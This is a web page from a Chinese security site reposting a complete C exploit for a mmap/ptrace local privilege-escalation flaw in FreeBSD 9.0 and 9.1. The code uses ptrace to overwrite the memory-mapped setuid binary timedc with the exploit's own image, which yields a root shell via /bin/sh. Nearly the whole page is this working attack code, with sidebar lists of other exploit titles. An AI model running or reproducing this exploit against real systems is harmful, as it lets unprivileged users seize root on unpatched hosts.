首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeBSD 9.0 / 9.1 mmap/ptrace Exploit
来源:fbsd9lul@hunger.hu 作者:Hunger 发布时间:2013-06-20  
/*
 * FreeBSD 9.{0,1} mmap/ptrace exploit
 * by Hunger <fbsd9lul@hunger.hu>
 *
 * Happy Birthday FreeBSD!
 * Now you are 20 years old and your security is the same as 20 years ago... :)
 *
 * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
 *              sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
 *                      I hope we'll meet again at 8@1470n ;)
 *
 * Special thanks to proactivesec.com
 *
 */

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
   int from_fd, to_fd, status;
   struct stat st;
   struct ptrace_io_desc piod;
   char *s, *d;
   pid_t pid;

   if (geteuid() == 0)  {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
   }

   printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
   printf("by Hunger <fbsd9lul@hunger.hu>\n");

   if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
                err(1, "open");

   if (stat(av[0], &st) == -1)
        err(2, "stat");

   if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                        MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                err(3, "mmap");

   if ((pid = fork()) == -1)
        err(4, "fork");

   if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
                err(5, "ptraceme");

        return 0;
        }

   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

   if (wait(&status) == -1)
        err(7, "wait");

   piod.piod_op = PIOD_WRITE_D;
   piod.piod_offs = d;
   piod.piod_addr = s;
   piod.piod_len  = st.st_size;

   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

   execl(TG, TG, NULL);

   return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MusicBee 2.0.4663 (.M3U) - Den
·ASC Timetables 2013 - Stack Bu
·TP-Link Print Server TL PS110U
·Mediacoder .m3u SEH Buffer Ove
·Havalite CMS Arbitary File Upl
·Mediacoder .lst SEH Buffer Ove
·FreeBSD mmap Privilege Escalat
·MediaCoder PMP Edition 0.8.17
·MoinMoin twikidraw Action Trav
·Novell Client 4.91 SP4 nwfs.sy
·Solaris 10 Patch Cluster File
·ZPanel 10.0.0.2 htpasswd Modul
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved